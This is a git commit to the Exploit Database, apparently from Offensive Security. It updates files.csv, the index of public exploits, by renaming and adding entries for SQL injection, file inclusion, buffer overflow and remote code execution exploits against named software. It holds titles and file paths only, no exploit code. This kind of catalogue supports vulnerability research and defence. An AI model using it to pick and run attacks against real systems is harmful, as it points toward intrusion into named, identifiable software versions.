DB: 2016-12-15

5 new exploits

Microsoft Internet Explorer 9 IEFRAME - CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)
Microsoft Internet Explorer 9 - IEFRAME CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)

Poppler 0.10.3 - Multiple Denial of Service Vulnerabilities
Poppler 0.10.3 - Denial of Service

Samsung Devices KNOX Extensions - OTP Service Heap Overflow

Serva 3.0.0 HTTP Server - Denial of Service
Serva 3.0.0 - HTTP Server Denial of Service
TP-LINK TD-W8151N - Denial of Service
Samsung Devices KNOX Extensions - OTP TrustZone Trustlet Stack Buffer Overflow

CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)
Youngzsoft CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)
Trixbox - (langChoice) Local File Inclusion (connect-back) (2)
Trixbox 2.6.1 - (langChoice) Remote Code Execution (Python)
Fonality trixbox - 'langChoice' Parameter Local File Inclusion (connect-back) (2)
Fonality trixbox 2.6.1 - 'langChoice' Parameter Remote Code Execution (Python)
Youngzsoft 3.30/4.0 CMailServer - Buffer Overflow (1)
Youngzsoft 3.30/4.0 CMailServer - Buffer Overflow (2)
Youngzsoft CMailServer 3.30/4.0 - Buffer Overflow (1)
Youngzsoft CMailServer 3.30/4.0 - Buffer Overflow (2)

Joomla! Component 'com_contenthistory' - SQL Injection / Remote Code Execution (Metasploit)
Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit)

McAfee Virus Scan Enterprise for Linux - Remote Code Execution

BrewBlogger 1.3.1 - (printLog.php) SQL Injection
BrewBlogger 1.3.1 - 'printLog.php' SQL Injection

ContentNow 1.30 - (Local File Inclusion / Arbitrary File Upload / Delete) Multiple Vulnerabilities
ContentNow 1.30 - Local File Inclusion / Arbitrary File Upload/Delete

ContentNow 1.30 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities
ContentNow 1.30 - Arbitrary File Upload / Cross-Site Scripting

ContentNow 1.39 - (pageid) SQL Injection
ContentNow 1.39 - 'pageid' Parameter SQL Injection

Maian Recipe 1.0 - (path_to_folder) Remote File Inclusion
Maian Recipe 1.0 - 'path_to_folder' Parameter Remote File Inclusion

Sisplet CMS 05.10 - (site_path) Remote File Inclusion
Sisplet CMS 05.10 - 'site_path' Parameter Remote File Inclusion
Sisplet CMS - 'index.php id' 2008-01-24 SQL Injection
VanGogh Web CMS 0.9 - (article_ID) SQL Injection
Sisplet CMS 2008-01-24 - 'id' Parameter SQL Injection
VanGogh Web CMS 0.9 - 'article_ID' Parameter SQL Injection
Efestech Shop 2.0 - 'cat_id' SQL Injection
plx Ad Trader 3.2 - (adid) SQL Injection
Joomla! Component versioning 1.0.2 - 'id' SQL Injection
Joomla! Component mygallery - 'cid' SQL Injection
XchangeBoard 1.70 - (boardID) SQL Injection
CMS little 0.0.1 - (index.php template) Local File Inclusion
Joomla! Component com_brightweblinks - 'catid' SQL Injection
Efestech Shop 2.0 - 'cat_id' Parameter SQL Injection
plx Ad Trader 3.2 - 'adid' Parameter SQL Injection
Joomla! Component versioning 1.0.2 - 'id' Parameter SQL Injection
Joomla! Component mygallery - 'cid' Parameter SQL Injection
XchangeBoard 1.70 - 'boardID' Parameter SQL Injection
CMS little 0.0.1 - 'template' Parameter Local File Inclusion
Joomla! Component Brightcode Weblinks - 'catid' Parameter SQL Injection

phPortal 1.2 - Multiple Remote File Inclusions
PHPortal 1.2 - Multiple Remote File Inclusions
phpWebNews 0.2 MySQL Edition - (id_kat) SQL Injection
phpWebNews 0.2 MySQL Edition - (det) SQL Injection
pHNews CMS - Multiple Local File Inclusion
PHPwebnews 0.2 MySQL Edition - 'id_kat' Parameter SQL Injection
PHPwebnews 0.2 MySQL Edition - 'det' Parameter SQL Injection
pHNews CMS Alpha 1 - Local File Inclusion

Kasseler CMS 1.3.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Kasseler CMS 1.3.0 - Local File Inclusion / Cross-Site Scripting
XPOZE Pro 3.06 - 'uid' SQL Injection
ContentNow 1.4.1 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities
SmartPPC Pay Per Click Script - '&idDirectory=' Blind SQL Injection (1)
XPOZE Pro 3.06 - 'uid' Parameter SQL Injection
ContentNow 1.4.1 - Arbitrary File Upload / Cross-Site Scripting
SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (1)
Fuzzylime CMS 3.01a - (file) Local File Inclusion
Triton CMS Pro - (x-forwarded-for) Blind SQL Injection
Neutrino 0.8.4 Atomic Edition - Remote Code Execution
SmartPPC Pay Per Click Script - '&idDirectory=' Blind SQL Injection (2)
Fuzzylime CMS 3.01a - 'file' Parameter Local File Inclusion
Triton CMS Pro 1.06 - 'x-forwarded-for' Blind SQL Injection
QNX Neutrino 0.8.4 Atomic Edition - Remote Code Execution
SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (2)

Joomla! Component com_content 1.0.0 - 'itemID' SQL Injection
Joomla! Component Content 1.0.0 - 'itemID' Parameter SQL Injection

BoonEx Ray 3.5 - (sIncPath) Remote File Inclusion
BoonEx Ray 3.5 - 'sIncPath' Parameter Remote File Inclusion
DreamPics Builder - (page) SQL Injection
DreamNews Manager - 'id' SQL Injection
gapicms 9.0.2 - (dirDepth) Remote File Inclusion
phpDatingClub - 'website.php' Local File Inclusion
DreamPics Builder - 'page' Parameter SQL Injection
DreamNews Manager - 'id' Parameter SQL Injection
gapicms 9.0.2 - 'dirDepth' Parameter Remote File Inclusion
phpDatingClub 3.7 - 'website.php' Local File Inclusion

Million Pixels 3 - (id_cat) SQL Injection
Million Pixels 3 - 'id_cat' Parameter SQL Injection
Fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution (PHP)
Fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution (Perl)
Fuzzylime CMS 3.01 - 'poll' Parameter Remote Code Execution (PHP)
Fuzzylime CMS 3.01 - 'poll' Parameter Remote Code Execution (Perl)
WebCMS Portal Edition - 'id' SQL Injection
jsite 1.0 oe - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities
Avlc Forum - 'vlc_forum.php id' SQL Injection
Fuzzylime CMS 3.01 - (commrss.php) Remote Code Execution
WebCMS Portal Edition - 'id' Parameter SQL Injection
jsite 1.0 oe - SQL Injection / Local File Inclusion
Avlc Forum - 'vlc_forum.php' SQL Injection
Fuzzylime CMS 3.01 - 'commrss.php' Remote Code Execution

Ultrastats 0.2.142 - (players-detail.php) Blind SQL Injection
Ultrastats 0.2.142 - 'players-detail.php' Blind SQL Injection

CodeDB - 'list.php lang' Local File Inclusion
CodeDB 1.1.1 - 'list.php' Local File Inclusion

Pluck 4.5.1 - (blogpost) Local File Inclusion (win only)
Pluck CMS 4.5.1 - 'blogpost' Parameter Local File Inclusion (win only)
Pragyan CMS 2.6.2 - (sourceFolder) Remote File Inclusion
Comdev Web Blogger 4.1.3 - (arcmonth) SQL Injection
Pragyan CMS 2.6.2 - 'sourceFolder' Parameter Remote File Inclusion
Comdev Web Blogger 4.1.3 - 'arcmonth' Parameter SQL Injection

phpWebNews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling
PHPwebnews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling

WebCMS Portal Edition - 'index.php id' Blind SQL Injection
WebCMS Portal Edition - 'id' Parameter Blind SQL Injection

Pluck 4.5.3 - (update.php) Remote File Corruption Exploit
Pluck CMS 4.5.3 - 'update.php' Remote File Corruption Exploit

Ultrastats 0.2.144/0.3.11 - (index.php serverid) SQL Injection
Ultrastats 0.2.144/0.3.11 - 'serverid' Parameter SQL Injection

Pluck CMS 4.5.3 - (g_pcltar_lib_dir) Local File Inclusion
Pluck CMS 4.5.3 - 'g_pcltar_lib_dir' Parameter Local File Inclusion

Fuzzylime CMS 3.03 - (track.php p) Local File Inclusion
Fuzzylime CMS 3.03 - 'track.php' Local File Inclusion

CMS little 0.0.1 - (index.php term) SQL Injection
CMS little 0.0.1 - 'term' Parameter SQL Injection

SHOP-INET 4 - 'show_cat2.php grid' SQL Injection
SHOP-INET 4 - 'grid' Parameter SQL Injection

Pluck CMS 4.6.1 - (module_pages_site.php post) Local File Inclusion
Pluck CMS 4.6.1 - 'module_pages_site.php' Local File Inclusion

Joomla! Component Maian Music 1.2.1 - (category) SQL Injection
Joomla! Component Maian Music 1.2.1 - 'category' Parameter SQL Injection

Pluck 4.6.2 - (langpref) Local File Inclusion
Pluck CMS 4.6.2 - 'langpref' Parameter Local File Inclusion

phportal 1.0 - Insecure Cookie Handling
PHPortal 1.0 - Insecure Cookie Handling

Kasseler CMS - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
Kasseler CMS - File Disclosure / Cross-Site Scripting

DreamPics Builder - (exhibition_id) SQL Injection
DreamPics Builder - 'exhibition_id' Parameter SQL Injection

Trixbox 2.2.4 - PhonecDirectory.php SQL Injection
Fonality trixbox 2.2.4 - 'PhonecDirectory.php' SQL Injection

Kasseler CMS 1.4.x lite - (Module Jokes) SQL Injection
Kasseler CMS 1.4.x lite Module Jokes - SQL Injection

PHPortal_1.2 - (gunaysoft.php) Remote File Inclusion
PHPortal 1.2 - 'gunaysoft.php' Remote File Inclusion

Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion (Metasploit)
Fonality trixbox CE 2.6.1 - 'langChoice' Parameter Local File Inclusion (Metasploit)

maian weblog 4.0 - Blind SQL Injection
Maian Weblog 4.0 - Blind SQL Injection

brewblogger 2.3.2 - Multiple Vulnerabilities
BrewBlogger 2.3.2 - Multiple Vulnerabilities
Maian Weblog 2.0 - print.php Multiple Parameter SQL Injection
Maian Weblog 2.0 - mail.php Multiple Parameter SQL Injection
Maian Weblog 2.0 - 'print.php' SQL Injection
Maian Weblog 2.0 - 'mail.php' SQL Injection
PHPwebnews 0.1 - iklan.php m_txt Parameter Cross-Site Scripting
PHPwebnews 0.1 - 'index.php' m_txt Parameter Cross-Site Scripting
PHPwebnews 0.1 - bukutamu.php m_txt Parameter Cross-Site Scripting
PHPwebnews 0.1 - 'iklan.php' Cross-Site Scripting
PHPwebnews 0.1 - 'index.php' Cross-Site Scripting
PHPwebnews 0.1 - 'bukutamu.php' Cross-Site Scripting

Joomla! Component com_content 1.5 RC3 - 'index.php' view Parameter SQL Injection
Joomla! Component Content 1.5 RC3 - 'view' Parameter SQL Injection
Trixbox 2.4.2 - user/index.php Query String Cross-Site Scripting
Trixbox 2.4.2 - maint/index.php Query String Cross-Site Scripting
Fonality trixbox 2.4.2 - Cross-Site Scripting

Pluck 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities
Pluck CMS 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities

Trixbox - SQL Injection
Fonality trixbox - SQL Injection

Trixbox - 'endpoint_aastra.php mac Parameter' Remote Code Injection
Fonality trixbox - 'mac' Parameter Remote Code Injection

THELIA 1.4.2.1 - Multiple Cross-Site Scripting Vulnerabilities

Pluck 4.6.3 - 'cont1' Parameter HTML Injection
Pluck CMS 4.6.3 - 'cont1' Parameter HTML Injection

Pluck 4.7 - Multiple Local File Inclusion / File Disclosure Vulnerabilities
Pluck CMS 4.7 - Multiple Local File Inclusion / File Disclosure Vulnerabilities

Boonex Dolphin 6.1 - 'xml/get_list.php' SQL Injection
Boonex Dolphin 6.1 - 'get_list.php' SQL Injection

Joomla! Component 'com_content' - 'year' Parameter SQL Injection
Joomla! Component Content - 'year' Parameter SQL Injection

Pluck 4.7 - Directory Traversal
Pluck CMS 4.7 - Directory Traversal

SenseSites CommonSense CMS - cat2.php id Parameter SQL Injection
SenseSites CommonSense CMS - 'id' Parameter SQL Injection
Fonality trixbox - /maint/modules/endpointcfg/endpoint_generic.php mac Parameter SQL Injection
Fonality trixbox - /maint/modules/home/index.php lang Parameter Directory Traversal
Fonality trixbox - '/maint/modules/asterisk_info/asterisk_info.php' lang Parameter Directory Traversal
Fonality trixbox - /maint/modules/repo/repo.php lang Parameter Directory Traversal
Fonality trixbox - '/maint/modules/endpointcfg/endpointcfg.php' lang Directory Traversal
Fonality trixbox - /var/www/html/maint/modules/home/index.php lang Parameter Remote Code Execution
Fonality trixbox - 'endpoint_generic.php' SQL Injection
Fonality trixbox - 'index.php' Directory Traversal
Fonality trixbox - 'asterisk_info.php' Directory Traversal
Fonality trixbox - 'repo.php' Directory Traversal
Fonality trixbox - 'endpointcfg.php' Directory Traversal
Fonality trixbox - 'index.php' Remote Code Execution

Joomla! Component DT Register - 'cat' SQL Injection
This commit is contained in:
Offensive Security 2016-12-15 05:01:19 +00:00
parent b080c70f8b
commit eddddf7aa8
7 changed files with 679 additions and 110 deletions

200
files.csv
View file

@ -3556,7 +3556,7 @@ id,file,description,date,author,platform,type,port
27925,platforms/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",linux,dos,0
27930,platforms/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow",2006-05-31,Mr.Niega,windows,dos,0
27942,platforms/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",hardware,dos,0
40907,platforms/windows/dos/40907.html,"Microsoft Internet Explorer 9 IEFRAME - CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)",2016-12-12,Skylined,windows,dos,0
40907,platforms/windows/dos/40907.html,"Microsoft Internet Explorer 9 - IEFRAME CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)",2016-12-12,Skylined,windows,dos,0
27993,platforms/multiple/dos/27993.txt,"FreeType - '.TTF' File Remote Denial of Service",2006-06-08,"Josh Bressers",multiple,dos,0
27981,platforms/linux/dos/27981.c,"GD Graphics Library 2.0.33 - Remote Denial of Service",2006-06-06,"Xavier Roche",linux,dos,0
28001,platforms/windows/dos/28001.c,"Microsoft SMB Driver - Local Denial of Service",2006-06-13,"Ruben Santamarta",windows,dos,0
@ -4120,7 +4120,7 @@ id,file,description,date,author,platform,type,port
32772,platforms/windows/dos/32772.py,"Nokia MultiMedia Player 1.1 - '.m3u' Heap Buffer Overflow",2009-02-03,zer0in,windows,dos,0
32774,platforms/multiple/dos/32774.txt,"QIP 2005 - Malformed Rich Text Message Remote Denial of Service",2009-02-04,ShineShadow,multiple,dos,0
32775,platforms/linux/dos/32775.txt,"Linux Kernel 2.6.x - 'make_indexed_dir()' Local Denial of Service",2009-02-16,"Sami Liedes",linux,dos,0
32800,platforms/linux/dos/32800.txt,"Poppler 0.10.3 - Multiple Denial of Service Vulnerabilities",2009-02-12,Romario,linux,dos,0
32800,platforms/linux/dos/32800.txt,"Poppler 0.10.3 - Denial of Service",2009-02-12,Romario,linux,dos,0
32815,platforms/linux/dos/32815.c,"Linux Kernel 2.6.x - Cloned Process 'CLONE_PARENT' Local Origin Validation",2009-02-25,"Chris Evans",linux,dos,0
32817,platforms/osx/dos/32817.txt,"Apple Safari 4 - Malformed 'feeds:' URI Null Pointer Dereference Remote Denial of Service",2009-02-25,Trancer,osx,dos,0
32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow",2009-02-27,"musashi karak0rsan",windows,dos,0
@ -4235,6 +4235,7 @@ id,file,description,date,author,platform,type,port
33532,platforms/multiple/dos/33532.txt,"Oracle Internet Directory 10.1.2.0.2 - 'oidldapd' Remote Memory Corruption",2006-11-10,Intevydis,multiple,dos,0
33533,platforms/windows/dos/33533.html,"Gracenote CDDBControl - ActiveX Control 'ViewProfile' Method Heap Buffer Overflow",2010-01-18,karak0rsan,windows,dos,0
33640,platforms/windows/dos/33640.py,"AIMP 2.8.3 - '.m3u' Remote Stack Buffer Overflow",2010-02-12,Molotov,windows,dos,0
40913,platforms/android/dos/40913.java,"Samsung Devices KNOX Extensions - OTP Service Heap Overflow",2016-12-13,"Google Security Research",android,dos,0
33549,platforms/linux/dos/33549.txt,"OpenOffice 3.1 - '.slk' Null Pointer Dereference Remote Denial of Service",2010-01-19,"Hellcode Research",linux,dos,0
33556,platforms/multiple/dos/33556.rb,"Wireshark CAPWAP Dissector - Denial of Service (Metasploit)",2014-05-28,j0sm1,multiple,dos,5247
33559,platforms/multiple/dos/33559.txt,"Sun Java System Web Server 7.0 Update 6 - 'admin' Server Denial of Service",2010-01-22,Intevydis,multiple,dos,0
@ -5302,8 +5303,10 @@ id,file,description,date,author,platform,type,port
40888,platforms/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",linux,dos,0
40896,platforms/windows/dos/40896.html,"Microsoft Internet Explorer 9 MSHTML - CElement::Has­Flag Memory Corruption",2016-12-09,Skylined,windows,dos,0
40899,platforms/linux/dos/40899.py,"OpenSSL 1.1.0a/1.1.0b - Denial of Service",2016-12-11,Silverfox,linux,dos,0
40905,platforms/windows/dos/40905.py,"Serva 3.0.0 HTTP Server - Denial of Service",2016-12-12,LiquidWorm,windows,dos,0
40905,platforms/windows/dos/40905.py,"Serva 3.0.0 - HTTP Server Denial of Service",2016-12-12,LiquidWorm,windows,dos,0
40906,platforms/ios/dos/40906.txt,"iOS 10.1.x - Certificate File Memory Corruption",2016-12-12,"Maksymilian Arciemowicz",ios,dos,0
40910,platforms/hardware/dos/40910.txt,"TP-LINK TD-W8151N - Denial of Service",2016-12-13,"Persian Hack Team",hardware,dos,0
40914,platforms/android/dos/40914.java,"Samsung Devices KNOX Extensions - OTP TrustZone Trustlet Stack Buffer Overflow",2016-12-13,"Google Security Research",android,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -9673,10 +9676,10 @@ id,file,description,date,author,platform,type,port
5827,platforms/windows/remote/5827.cpp,"Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow",2008-06-15,Heretic2,windows,remote,4000
5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G (Firmware 1.00.9) - Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0
6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow",2008-07-04,"Karol Wiesek",windows,remote,0
6012,platforms/windows/remote/6012.php,"CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,windows,remote,80
6012,platforms/windows/remote/6012.php,"Youngzsoft CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,windows,remote,80
6013,platforms/osx/remote/6013.pl,"Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,osx,remote,0
6026,platforms/linux/remote/6026.pl,"Trixbox - (langChoice) Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80
6045,platforms/linux/remote/6045.py,"Trixbox 2.6.1 - (langChoice) Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80
6026,platforms/linux/remote/6026.pl,"Fonality trixbox - 'langChoice' Parameter Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80
6045,platforms/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Parameter Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80
6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80
6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0
6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,windows,remote,80
@ -12162,8 +12165,8 @@ id,file,description,date,author,platform,type,port
21452,platforms/windows/remote/21452.txt,"Microsoft Internet Explorer 5.0.1/6.0 - Content-Disposition Handling File Execution",2002-05-15,"Jani Laatikainen",windows,remote,0
21453,platforms/multiple/remote/21453.txt,"SonicWALL SOHO3 6.3 - Content Blocking Script Injection",2002-05-17,"E M",multiple,remote,0
21456,platforms/hardware/remote/21456.txt,"Cisco IDS Device Manager 3.1.1 - Arbitrary File Read Access",2002-05-17,"Andrew Lopacki",hardware,remote,0
21466,platforms/windows/remote/21466.c,"Youngzsoft 3.30/4.0 CMailServer - Buffer Overflow (1)",2002-05-20,anonymous,windows,remote,0
21467,platforms/windows/remote/21467.c,"Youngzsoft 3.30/4.0 CMailServer - Buffer Overflow (2)",2002-05-21,Over_G,windows,remote,0
21466,platforms/windows/remote/21466.c,"Youngzsoft CMailServer 3.30/4.0 - Buffer Overflow (1)",2002-05-20,anonymous,windows,remote,0
21467,platforms/windows/remote/21467.c,"Youngzsoft CMailServer 3.30/4.0 - Buffer Overflow (2)",2002-05-21,Over_G,windows,remote,0
21468,platforms/windows/remote/21468.pl,"Matu FTP Server 1.13 - Buffer Overflow",2002-05-22,Kanatoko,windows,remote,0
21469,platforms/windows/remote/21469.txt,"NewAtlanta ServletExec/ISAPI 4.1 - Full Path Disclosure",2002-05-22,"Matt Moore",windows,remote,0
21470,platforms/windows/remote/21470.txt,"NewAtlanta ServletExec/ISAPI 4.1 - File Disclosure",2002-05-22,"Matt Moore",windows,remote,0
@ -14932,7 +14935,7 @@ id,file,description,date,author,platform,type,port
38742,platforms/windows/remote/38742.txt,"Aloaha PDF Suite - Stack Based Buffer Overflow",2013-08-28,"Marcos Accossatto",windows,remote,0
38764,platforms/hardware/remote/38764.rb,"F5 iControl - 'iCall::Script' Root Command Execution (Metasploit)",2015-11-19,Metasploit,hardware,remote,443
38766,platforms/multiple/remote/38766.java,"Mozilla Firefox 9.0.1 - Same Origin Policy Security Bypass",2013-09-17,"Takeshi Terada",multiple,remote,0
38797,platforms/php/remote/38797.rb,"Joomla! Component 'com_contenthistory' - SQL Injection / Remote Code Execution (Metasploit)",2015-11-23,Metasploit,php,remote,80
38797,platforms/php/remote/38797.rb,"Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit)",2015-11-23,Metasploit,php,remote,80
38802,platforms/multiple/remote/38802.txt,"Oracle GlassFish Server 2.1.1/3.0.1 - Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access",2013-10-15,"Alex Kouzemtchenko",multiple,remote,0
38804,platforms/hardware/remote/38804.py,"Multiple Level One Enterprise Access Point Devices - 'backupCfg.cgi' Security Bypass",2013-10-15,"Richard Weinberger",hardware,remote,0
38805,platforms/multiple/remote/38805.txt,"SAP Sybase Adaptive Server Enterprise - XML External Entity Information Disclosure",2015-11-25,"Igor Bulatenko",multiple,remote,0
@ -15151,6 +15154,7 @@ id,file,description,date,author,platform,type,port
40868,platforms/windows/remote/40868.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH)",2016-12-05,vportal,windows,remote,0
40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0
40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer jscript9 - Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0
40911,platforms/linux/remote/40911.py,"McAfee Virus Scan Enterprise for Linux - Remote Code Execution",2016-12-13,"Andrew Fasano",linux,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16875,7 +16879,7 @@ id,file,description,date,author,platform,type,port
2747,platforms/php/webapps/2747.txt,"MyAlbum 3.02 - (language.inc.php) Remote File Inclusion",2006-11-09,"Silahsiz Kuvvetler",php,webapps,0
2748,platforms/php/webapps/2748.pl,"PHPManta 1.0.2 - (view-sourcecode.php) Local File Inclusion",2006-11-09,ajann,php,webapps,0
2750,platforms/php/webapps/2750.txt,"EncapsCMS 0.3.6 - (core/core.php) Remote File Inclusion",2006-11-10,Firewall,php,webapps,0
2751,platforms/php/webapps/2751.txt,"BrewBlogger 1.3.1 - (printLog.php) SQL Injection",2006-11-10,"Craig Heffner",php,webapps,0
2751,platforms/php/webapps/2751.txt,"BrewBlogger 1.3.1 - 'printLog.php' SQL Injection",2006-11-10,"Craig Heffner",php,webapps,0
2752,platforms/php/webapps/2752.txt,"WORK System E-Commerce 3.0.1 - Remote File Inclusion",2006-11-10,SlimTim10,php,webapps,0
2754,platforms/asp/webapps/2754.pl,"NuCommunity 1.0 - (cl_CatListing.asp) SQL Injection",2006-11-11,ajann,asp,webapps,0
2755,platforms/asp/webapps/2755.pl,"NuRems 1.0 - (propertysdetails.asp) SQL Injection",2006-11-11,ajann,asp,webapps,0
@ -16891,13 +16895,13 @@ id,file,description,date,author,platform,type,port
2765,platforms/asp/webapps/2765.txt,"UPublisher 1.0 - (viewarticle.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0
2766,platforms/php/webapps/2766.pl,"CMSmelborp Beta - 'user_standard.php' Remote File Inclusion",2006-11-12,DeltahackingTEAM,php,webapps,0
2767,platforms/php/webapps/2767.txt,"StoryStream 4.0 - 'baseDir' Remote File Inclusion",2006-11-12,v1per-haCker,php,webapps,0
2768,platforms/php/webapps/2768.txt,"ContentNow 1.30 - (Local File Inclusion / Arbitrary File Upload / Delete) Multiple Vulnerabilities",2006-11-13,r0ut3r,php,webapps,0
2768,platforms/php/webapps/2768.txt,"ContentNow 1.30 - Local File Inclusion / Arbitrary File Upload/Delete",2006-11-13,r0ut3r,php,webapps,0
2769,platforms/php/webapps/2769.php,"Quick.Cart 2.0 - (actions_client/gallery.php) Local File Inclusion",2006-11-13,Kacper,php,webapps,0
2772,platforms/asp/webapps/2772.htm,"Online Event Registration 2.0 - (save_profile.asp) Pass Change Exploit",2006-11-13,ajann,asp,webapps,0
2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - 'default.asp' Login Bypass",2006-11-13,ajann,asp,webapps,0
2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - (vir_Login.asp) Remote Login Bypass",2006-11-13,ajann,asp,webapps,0
2775,platforms/php/webapps/2775.txt,"Phpjobscheduler 3.0 - (installed_config_file) File Inclusion",2006-11-13,Firewall,php,webapps,0
2776,platforms/php/webapps/2776.txt,"ContentNow 1.30 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2006-11-14,Timq,php,webapps,0
2776,platforms/php/webapps/2776.txt,"ContentNow 1.30 - Arbitrary File Upload / Cross-Site Scripting",2006-11-14,Timq,php,webapps,0
2777,platforms/php/webapps/2777.txt,"Aigaion 1.2.1 - (DIR) Remote File Inclusion",2006-11-14,navairum,php,webapps,0
2778,platforms/php/webapps/2778.txt,"PHPPeanuts 1.3 Beta - (Inspect.php) Remote File Inclusion",2006-11-14,"Hidayat Sagita",php,webapps,0
2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 - 'default.asp' Login Bypass (SQL Injection)",2006-11-14,ajann,asp,webapps,0
@ -16924,7 +16928,7 @@ id,file,description,date,author,platform,type,port
2818,platforms/php/webapps/2818.txt,"e-Ark 1.0 - (src/ark_inc.php) Remote File Inclusion",2006-11-21,DeltahackingTEAM,php,webapps,0
2819,platforms/php/webapps/2819.txt,"LDU 8.x - (avatarselect id) SQL Injection",2006-11-21,nukedx,php,webapps,0
2820,platforms/php/webapps/2820.txt,"Seditio 1.10 - (avatarselect id) SQL Injection",2006-11-21,nukedx,php,webapps,0
2822,platforms/php/webapps/2822.pl,"ContentNow 1.39 - (pageid) SQL Injection",2006-11-21,Revenge,php,webapps,0
2822,platforms/php/webapps/2822.pl,"ContentNow 1.39 - 'pageid' Parameter SQL Injection",2006-11-21,Revenge,php,webapps,0
2823,platforms/php/webapps/2823.txt,"aBitWhizzy - 'abitwhizzy.php' Information Disclosure",2006-11-21,"Security Access Point",php,webapps,0
2826,platforms/php/webapps/2826.txt,"Pearl Forums 2.4 - Multiple Remote File Inclusion",2006-11-21,3l3ctric-Cracker,php,webapps,0
2827,platforms/php/webapps/2827.txt,"phpPC 1.04 - Multiple Remote File Inclusion",2006-11-21,iss4m,php,webapps,0
@ -17222,7 +17226,7 @@ id,file,description,date,author,platform,type,port
3281,platforms/php/webapps/3281.txt,"WebMatic 2.6 - (index_album.php) Remote File Inclusion",2007-02-07,MadNet,php,webapps,0
3282,platforms/php/webapps/3282.pl,"Advanced Poll 2.0.5-dev - Remote Admin Session Generator Exploit",2007-02-07,diwou,php,webapps,0
3283,platforms/php/webapps/3283.txt,"otscms 2.1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2007-02-07,GregStar,php,webapps,0
3284,platforms/php/webapps/3284.txt,"Maian Recipe 1.0 - (path_to_folder) Remote File Inclusion",2007-02-07,Denven,php,webapps,0
3284,platforms/php/webapps/3284.txt,"Maian Recipe 1.0 - 'path_to_folder' Parameter Remote File Inclusion",2007-02-07,Denven,php,webapps,0
